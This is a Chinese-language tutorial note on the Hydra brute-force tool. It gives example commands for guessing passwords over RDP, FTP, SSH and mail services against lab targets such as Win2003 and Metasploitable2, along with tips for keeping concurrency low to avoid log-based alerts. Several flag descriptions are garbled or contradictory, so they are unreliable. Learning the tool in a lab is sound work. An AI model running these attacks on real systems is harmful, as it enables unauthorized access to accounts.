linux、win2003、kali
檢視 hydra 幫助資訊:
使用示例:
examples:
hydra -l user -p passlist.txt
hydra -l userlist.txt -p defaultpw imap:
hydra -c defaults.txt -6 pop3s://[2001:db8::1]:143/tls:digest-md5
hydra -l admin -p password ftp://[192.168.0.0/24]/
hydra -l logins.txt -p pws.txt -m targets.txt ssh
-l 後面跟著 具體的使用者名稱
-p 後面跟著 具體的密碼
-l 後面跟著 使用者字典
-p 後面跟著 密碼字典
資訊發現:
445、139檔案共享服務
3389遠端桌面
(1)win2003 檢視你檔案共享
(2)開始破解
爆破 3389 埠
hydra -l administrator -p pass.txt rdp: -v
一般爆破 rdp 最後別選擇多程序、多執行緒:
目標機:metasploitable2
埠掃瞄下:
這次使用者和密碼都用字典試試:
hydra -l user.txt -p pass.txt ftp: -s 2121 -e nsr -t 1 -vv
-s:指定服務埠
-r 根據上一次進度繼續破解
-s 使用ssl協議連線
-s 指定埠
-l 指定使用者名稱
-l 指定使用者名稱字典(檔案)
-p 指定密碼破解
-p 指定密碼字典(檔案)
-e 空密碼探測和指定使用者密碼探測(ns)
-c 使用者名稱可以用:分割(username:password)可以代替-l username -p password
-o 輸出檔案
-t 指定多執行緒數量,預設為16個執行緒
-vv 顯示詳細過程
server 目標ip
service 指定服務名(telnet ftp pop3 mssql mysql ssh ssh2..
....
)
日誌報警機制: 控制單位時間內單個ip訪問次數
所以一般不選擇多併發進行爆破!
hydra同樣支援 網頁登入口密碼爆破,就不介紹了,bp也挺好用的,哈哈!
另外hydra也有圖形化的介面
hydra簡單使用示例
本內容為網上收集整理,僅作為備忘!hydra簡單使用示例 破解https 破解teamspeak hydra l 使用者名稱 p 密碼字典 s 埠號 vv ip teamspeak 破解cisco hydra p pass.txt 10.36.16.18 cisco hydra m cloud p ...
使用Hydra爆破表單
部落格位址 github kali linux web靶機 github傳送門 靶機表單內容如下 表單截圖 假設網域名稱為host.com,表單路徑為 pikachu vul burteforce bf form.php 執行命令如下 hydra l admin p root rockyou.txt...
hydra 簡易使用
暴力破解用的協議 rdp 個人筆記,邊使用hydra邊做,準確性無保障。安裝kali系統 安裝的kali linux 64 bit installer 版本2020.4 1.具體位置 2.hydra和hydra gtk hydra 點開直接是命令列介面,相當於直接使用命令列執行。可以直接開終端,使用...